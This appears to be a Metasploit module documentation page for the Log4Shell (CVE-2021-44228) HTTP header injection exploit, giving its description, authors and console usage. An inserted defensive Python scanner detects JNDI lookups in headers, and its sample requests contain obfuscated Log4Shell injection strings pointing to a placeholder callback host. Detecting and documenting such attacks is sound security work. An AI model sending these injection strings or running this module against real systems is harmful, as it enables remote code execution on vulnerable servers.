module

Log4Shell HTTP Header Injection

Disclosed: 12/09/2021
Created: 01/17/2022

Description

Versions of Apache Log4j2 impacted by CVE-2021-44228 allow JNDI features to be used in configuration,
log messages, and parameters, and do not protect against attacker-controlled LDAP and other JNDI-related endpoints.

This module exploits an HTTP endpoint with the Log4Shell vulnerability by injecting a format message that
triggers an LDAP connection to Metasploit and loads a payload.

The Automatic target delivers a Java payload using remote class loading. This requires Metasploit to run an HTTP
server in addition to the LDAP server that the target can connect to. The targeted application must have the
trusted code base option enabled for this technique to work.

The non-Automatic targets deliver a payload via a serialized Java object. This does not require Metasploit to
run an HTTP server and instead leverages the LDAP server to deliver the serialized object. The target
application in this case must be compatible with the user-specified JAVA_GADGET_CHAIN option.
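As an added example (not part of the module or of this page's original content), a defender-side check for the header injection described above: it scans request headers for JNDI lookup strings, URL-decoding each value and collapsing nested lookups that resolve to literals before matching. The function names, header names and hostnames are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Nested lookups that resolve to a literal: ${lower:x}, ${upper:x}, ${name:-default}
_NESTED = re.compile(
    r"\$\{(?:lower|upper):([^${}]*)\}|\$\{[^${}]*?:-([^${}]*)\}", re.I)
# A JNDI lookup: ${jndi:<scheme>://<host>...}
_JNDI = re.compile(r"\$\{jndi:([a-z]+):/{0,2}([^/:}\s]*)", re.I)


def expand(value, max_rounds=5):
    """Return the URL-decoded value followed by each collapsed form of it."""
    forms = [unquote(value)]
    for _ in range(max_rounds):  # bounded, so hostile nesting cannot loop forever
        collapsed = _NESTED.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2),
            forms[-1])
        if collapsed == forms[-1]:
            break
        forms.append(collapsed)
    return forms


def scan_headers(headers):
    """Return one finding per header whose value contains a JNDI lookup."""
    findings = []
    for name, raw in headers.items():
        for form in expand(raw):  # test every form so collapsing cannot hide a hit
            match = _JNDI.search(form)
            if match:
                findings.append({"header": name,
                                 "scheme": match.group(1).lower(),
                                 "host": match.group(2)})
                break
    return findings


# Constructed sample requests (header name -> value); hosts are placeholders.
SAMPLE_REQUESTS = [
    {"User-Agent": "Mozilla/5.0",
     "X-Api-Version": "${jndi:ldap://callback.example.invalid:1389/a}"},
    {"User-Agent": "${${lower:j}ndi:${::-l}dap://callback.example.invalid/a}"},
    {"Referer": "%24%7Bjndi%3Aldap%3A%2F%2Fcallback.example.invalid%2Fa%7D"},
    {"User-Agent": "curl/8.4.0", "Accept": "*/*"},
]

if __name__ == "__main__":
    for number, request in enumerate(SAMPLE_REQUESTS, 1):
        print(number, scan_headers(request) or "clean")
```

Lookups that only resolve at runtime cannot be collapsed statically, so a clean result here is not evidence that a request was harmless.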

Authors

Michael Schierl, juan vazquez, sinn3r, Spencer McIntyre, RageLtMan

Module Options

To display the available options, load the module within the Metasploit console and run the commands ‘show options’ or ‘show advanced’:

    msf > use exploit/multi/http/log4shell_header_injection
    msf /(n) > show actions
        ...actions...
    msf /(n) > set ACTION < action-name >
    msf /(n) > show options
        ...show and set options...
    msf /(n) > run
  